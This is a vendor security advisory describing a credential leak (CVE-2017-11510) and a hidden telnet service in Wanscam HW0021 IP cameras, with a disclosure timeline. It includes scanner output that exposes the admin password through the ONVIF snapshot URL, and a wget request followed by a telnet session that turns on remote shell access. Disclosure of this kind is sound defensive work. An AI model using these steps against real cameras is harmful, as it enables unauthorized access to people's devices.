Synopsis
While investigating Pierre Kim's disclosure, Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server, Tenable came across a couple of vulnerabilities in Wanscam's HW0021 network camera. These vulnerabilities sound similar to a couple of vulnerabilities FSecure encountered in Foscam devices. Its unclear to Tenable how Foscam and Wanscam are related.
CVE-2017-11510: Administrator Username and Password Disclosure
The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 replies to a remote unauthenticated user's GetSnapshotUri request it responds with a URL that includes the admin username and password. Here is an example from Nessus' ONVIF implementation:LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl ----------[ Executing onvif_detect.nbin ]------ The ONVIF service listening on UDP port 3702 advertises the following information: Endpoint: http://192.168.1.178:8080/onvif/devices Name: IPCAM Model: C6F0SeZ0N0P0L0 audit-trail:success: The service listening on port 3702 has already been identified. ----------[ Finished onvif_detect.nbin ]------ ----------[ Executing onvif_get_endpoints.nasl ]------ The ONVIF server on port 8080 supports these services: http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media ----------[ Finished onvif_get_endpoints.nasl ]------ ----------[ Executing ./onvif_get_snapshot.nasl ]------ It was possible to obtain a screenshot from the following URL on the remote camera: http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle& ----------[ Finished ./onvif_get_snapshot.nasl ]------You can see the username (admin) and password (cheesedoodle) in the final plugin.
Hidden Telnet Functionality
Telnet is not enabled by default on the device. However, if an authenticated user visits /web/cgi-bin/hi3510/printscreenrequest.cgi then telnetd starts up.albinolobster@ubuntu:~$ telnet 192.168.1.178 Trying 192.168.1.178... telnet: Unable to connect to remote host: Connection refused albinolobster@ubuntu:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null albinolobster@ubuntu:~$ telnet 192.168.1.178 Trying 192.168.1.178... Connected to 192.168.1.178. Escape character is '^]'. IPCamera login:
Solution
A patch has not been published.Additional References
http://images.news.f-secure.com/Web/FSecure/%7B43df9e0d-20a8-404a-86d0-70dcca00b6e5%7D_vulnerabilities-in-foscam-IP-cameras_report.pdfDisclosure Timeline
08/01/17 - Reached out to [email protected] for appropriate security related contact
08/03/17 - Lacking a response, attempted to establish communication via [email protected] [email protected] [email protected] and [email protected]
08/04/17 - Response from support asking me to fill out word document.
08/04/17 - Tenable not certain support understands. Tenable sends the disclosure information to clear things up.
08/06/17 - Support asks for a picture of the camera
08/06/17 - Tenable responds with a link to the camera on their website: http://www.wanscam.com/productshow-7-56-1.html - Somewhat concerned that they ignored the disclosure
08/08/17 - Support informs Tenable that we can change the username/password in the user settings
08/08/17 - Tenables responds that we understand that but the system will still provide an unauthenticated user with the changed credentials
08/08/17 - Support replies with a confusing message. Lost in translation we think.
08/08/17 - Tenable reminds them that we sent PoC of the vulns.
08/09/17 - Support says they've never come across these issues
08/16/17 - Tenable asks them to confirm if they tried the proof of concepts
08/17/17 - Support tells Tenable that you can change the password and dev says there is no telnet functionality
08/17/17 - Tenable reminds support that it doesn't matter if the password is changed and we've provided proof there is telnet functionality. We are kind of going in circles here.
11/10/17 - Advisory published
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team